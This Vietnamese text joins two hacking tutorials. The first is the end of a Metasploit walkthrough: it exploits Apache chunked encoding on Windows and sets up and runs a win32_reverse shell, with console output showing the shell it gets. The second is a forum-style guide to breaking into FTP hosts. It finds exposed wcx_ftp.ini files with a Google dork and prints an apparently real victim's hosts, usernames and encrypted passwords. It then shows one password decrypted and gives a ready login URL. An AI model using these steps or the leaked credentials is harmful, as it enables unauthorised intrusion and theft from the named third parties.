Bây giờ chúng ta sẽ thiết lập giá trị cho trường này. Sau đó tiếp tục thực hiện dần dần với các tuỳ chọn khác nhau khác trước khi sử dụng lỗ hổng để tăng mức truy cập hệ thống trên Web server. Ở đây bạn sẽ dùng lệnh sau để xem chúng ta có thể dùng được loại payload nào:

msf apache_chunked_win32 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_bind

Windows Bind Shell

win32_bind_dllinject

Windows Bind DLL Inject

win32_bind_stg

Windows Staged Bind Shell

win32_bind_stg_upexec

Windows Staged Bind Upload/Execute

win32_bind_vncinject

Windows Bind VNC Server DLL Inject

win32_reverse

Windows Reverse Shell

win32_reverse_dllinject

Windows Reverse DLL Inject

win32_reverse_stg

Windows Staged Reverse Shell

win32_reverse_stg_ie

Windows Reverse InlineEgg Stager

win32_reverse_stg_upexec

Windows Staged Reverse Upload/Execute

win32_reverse_vncinject

Windows Reverse VNC Server DLL Inject

msf apache_chunked_win32 >

Lựa chọn trên cho phép sử dụng bất kỳ phần nào bạn chọn. Có nghĩa là bạn sẽ có thể thực thi bất kỳ playload nào đã chọn bằng CPU của máy nạn nhân khi khai thác lỗ hổng bạn đang nhắm đến. Có thêm lựa chọn mở rộng này là một trong nhiều cách dùng tuyệt vời của công cụ bảo mật.

Có rất nhiều lựa chọn dành cho bạn. Ở trường hợp của chúng ta là win32_reverse payload vì nó giúp tạo ra được lớp vỏ bên ngoài, cho phép sử dụng được nhiều lần khai thác để tấn công. Để rõ hơn bạn có thể copy lại file index.html và điều chỉnh nó bằng cách thay đổi giao diện. Xây dựng được lớp bên ngoài cho phép chúng ta thực hiện điều đó. Còn Framework bạn có tuỳ chọn payload thì sao? Hãy xem cú pháp bên dưới:

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >

Bây giờ chúng ta đã thiết lập thông số cho payload và quay trở lại màn hình lệnh. Tiếp theo là thiết lập địa chỉ IP để nhận lớp ngoài đảo ngược. Thiết lập cho host nhận cũng tương tự như một vài bước biết lập cho RHOST trước đây để đặc tả máy sẽ tấn công. Thực hiện như sau:

msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >

Bây giờ chúng ta đã thực sự sẵn sàng khởi động lỗ hổng. Cú pháp như sau:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
[*] Starting Reverse Handler.[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360…[*] Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>

Từ trên bạn có thể thấy màn hình lệnh trong thư mục Apache. Có một tuỳ chọn khác chúng ta có thể sử dụng để đặc tả hệ điều hành đang dùng trong trường hợp này là “target”. Ngay cả khi bạn không mô tả tường minh, nó cũng sẽ cố gắng “thu xếp” để thực hiện những việc nó có thể làm. Để dùng tuỳ chọn target (đích), thực hiện như sau:

msf apache_chunked_win32(win32_reverse) > show targets

Danh sách các đích (target) sẽ được đưa ra. Tất cả việc bạn cần làm là chọn thứ bạn muốn và thiết lập nó như đã làm ở trên:

msf apache_chunked_win32(win32_reverse) > set TARGET 1

Câu lệnh trên nhập đích thứ nhất nếu server bộ nhớ là W2K Pro,

Công việc đến đây có thể nói là đã hoàn thành. Web server Apache bây giờ đã bị bạn xâm hại và có phần bên ngoài đảo ngược. Bạn hoàn toàn có quyền kiểm soát và thao tác trên nó.

reflink: http://roseandgun.wordpress.com/2010/04/24/su-dung-metasploit-framework/

[Hacking] Cách hack host FTP

Xin giới thiệu một cách hack host FTP
Tui tung ra 2 host FTP lớn như vậy mà hình như ko ai thấy giá trị của nó thì phải!? Buồn thật đó. Hnay tui chỉ cho bạn cách hack cực đơn giản, hiệu quả 75%. Mà cụ thể với cách này, tui đã chui vào được 2 host FTP đã đăng

Công cụ:
- ShadowScan (Một công cụ đa năng tuyệt vời cho hackers)
- WS_FTP Pro

Thực hiện:

1. Vào Google tìm keyword sau: filetype:ini wcx_ftp
Xin nói rõ thêm. Đây là mình đi tìm file WCX_FTP.INI là một file chứa user/pass của host FTP. Khi chủ nhân dùng Windows Commander V4.51+ để login vào host FTP của họ thì file này được tạo ra chứa thông tin login.

2. Sau đó tìm cách mở các trang tìm được ra. Nếu trang nào bạn click vào nó ko hiện ra thì bạn click vào Cached của Google thì sẽ thấy.
Tui xin lấy ví dụ cụ thể luôn:

- Nạn nhân: www.stanikjr.iserwer.net/wcx_ftp.ini –> Chọn Cached
- Thông tin tìm được:

[OldConnections] 0=radomsko.net 1=przepiorka.info 2=stanikjr.iserwer.net 3=www.danceexpress.hg.pl [connections] 1=przepiorka default=przepiorka 2=przepiorka.info na pracowym [default] pasvmode=1 [przepiorka] host=stanikjr.iserwer.net username=stanikjr pasvmode=1 password=CFD75ED8917E38C20AE7 directory=www/przepiorka/ [przepiorka.info na pracowym] host=przepiorka.info username=admin@przepiorka.info pasvmode=1 password=E5BFCDB009528BAE465F16

- Với đống “shit” vàng này trong tay chúng ta xử lí ra sao!? Để ý thấy Ông cu cởi trần mặc quần:
host=stanikjr.iserwer.net username=stanikjr pasvmode=1 password=CFD75ED8917E38C20AE7

Hiểu ngay ra rằng Ông cu này:
-Nhà nó ở (host FTP): stanikjr.iserwer.net
-Tên nó là: stanikjr
-Còn cái “Em Xin Chị” nó dài (pass): CFD75ED8917E38C20AE7

3. Chà, “Em Xin Chị” nó bị quần che rồi. Làm sao đây tụt ra đây, làm sao đây!??? Được, ta thuê Ông đầu gấu ShadowScan tới tụt hộ. Down chương trình này về (search trên Google) rồi chạy. Bên trái chương trình bạn sẽ thấy các công cụ. Bạn chọn Plugins > Wincommander FTP. Đây là Ông đầu gấu chuyên tụt quần (decryte pass) dạng trên. Bạn cho Ông cu vào “Enter Encrypted String” rồi ấn ấn nút “Decrypt String” là thấy “Em Xin Chị” nó lộ nguyên hình.

CFD75ED8917E38C20AE7 —> HJ87jg

4. Rồi, bây giờ thấy hết của quí nhà nó rồi, anh em đàng hoàng vào cửa chính nhà nó.
Bạn có thể access vào host FTP trên bằng cách gõ
ftp://stanikjr:HJ87jg@stanikjr.iserwer.net vào Browser.
Còn nếu muốn quậy tưng bừng thì dùng WS_FTP pro.